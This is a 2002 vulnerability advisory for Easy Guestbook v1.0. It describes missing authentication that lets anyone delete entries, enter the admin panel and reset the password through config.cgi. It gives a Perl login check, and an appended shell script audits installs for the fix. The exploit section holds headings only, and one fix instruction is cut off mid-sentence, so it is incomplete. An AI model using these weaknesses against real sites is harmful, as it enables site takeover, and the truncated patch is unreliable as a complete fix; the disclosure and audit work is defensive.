AresU Advisory 19/July/2002

Easy Guestbook Vulnerabilities

Severity         : High (Possible to edit member homepage)
Systems Affected : Easy Guestbook v1.0
Vendor URL       : http://www.easyscripts.co.uk
Vuln Type        : No access validation is performed when deleting entries or logging in to Admin Control.
Author           : AresU
Greetz to        : Bosen, Tioeuy, eF73, SakitJiwa, nimdA, Br0374l, FreshFirst, Algorithm, Mr.Padang

Summary
=======
1) Anyone can delete entries and log in to Admin Control.
2) Anyone can reconfigure the Guestbook by opening config.cgi, and can change the Admin Password.

Solution
========
1) Add access validation to the "delete_message" function and the "start" function.
   Add this code to admin.cgi:

    # Abort with an error page unless the submitted login matches
    # $username and $password.
    sub login_verify {
        chomp($FORM{'login_username'});
        chomp($FORM{'login_password'});
        if (!($FORM{'login_username'} eq $username &&
              $FORM{'login_password'} eq $password)) {
            dienice("Sorry, but you have entered an invalid username or password. Please press the 'back' button on your browser to return to the Login Screen.");
        }
    }

   And on the first line of the "delete_message" function and the "start" function add this:

    &login_verify;

   And on the "start" function add this code in the
   :

2) Delete config.cgi after you finish configuring the Guestbook.

Acknowledgments
===============
Vulnerability discovery, exploit code, and advisory by AresU

Vendor Response
===============
The vendor was contacted about 7 days ago but has not responded yet.

Exploit Code
============

Easy Guestbook v1.0 Vulnerabilities

Delete No. of Entries in Guestbook:

Open Administration Guestbook:
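
A check for the two items in the Solution section, added here as an example (it is not part of the original advisory or of the vendor's code): a shell audit that reports whether config.cgi is still present and whether "delete_message" and "start" in admin.cgi call login_verify before anything else. It assumes admin.cgi declares each handler on its own line as "sub NAME {"; the function names audit_guestbook and first_stmt are hypothetical.

```shell
#!/bin/sh
# Audit an Easy Guestbook v1.0 directory against the advisory's Solution section.
# Assumption: admin.cgi declares handlers one per line as "sub NAME {".

# first_stmt FILE SUB: print the first line inside "sub SUB" that is not
# blank, a comment, or a lone opening brace.
first_stmt() {
    awk -v name="$2" '
        found && !/^[ \t]*(#.*|[{])?[ \t\r]*$/ {
            gsub(/^[ \t]+|[ \t\r]+$/, ""); print; exit
        }
        $0 ~ "^[ \t]*sub[ \t]+" name "[ \t]*[{]?[ \t\r]*$" { found = 1 }
    ' "$1"
}

# audit_guestbook DIR: print one FAIL line per finding; return 0 if clean.
audit_guestbook() {
    dir=$1
    findings=0
    # Solution 2: config.cgi must be deleted once configuration is done.
    if [ -e "$dir/config.cgi" ]; then
        echo "FAIL config.cgi is still present and can be used to reconfigure the guestbook"
        findings=$((findings + 1))
    fi
    if [ ! -f "$dir/admin.cgi" ]; then
        echo "FAIL admin.cgi not found in $dir"
        return 1
    fi
    # Solution 1: login_verify must exist and be the first statement of both handlers.
    if ! grep -Eq '^[[:space:]]*sub[[:space:]]+login_verify' "$dir/admin.cgi"; then
        echo "FAIL admin.cgi does not define login_verify"
        findings=$((findings + 1))
    fi
    for fn in delete_message start; do
        case "$(first_stmt "$dir/admin.cgi" "$fn")" in
            '&login_verify;'* | '&login_verify();'* | 'login_verify();'*) ;;
            *)  echo "FAIL sub $fn does not call login_verify first"
                findings=$((findings + 1)) ;;
        esac
    done
    [ "$findings" -eq 0 ]
}

# Run against a directory when one is given on the command line.
if [ $# -gt 0 ]; then audit_guestbook "$1"; fi
```

Run it as `sh audit.sh /path/to/guestbook`; a clean install prints nothing and exits 0.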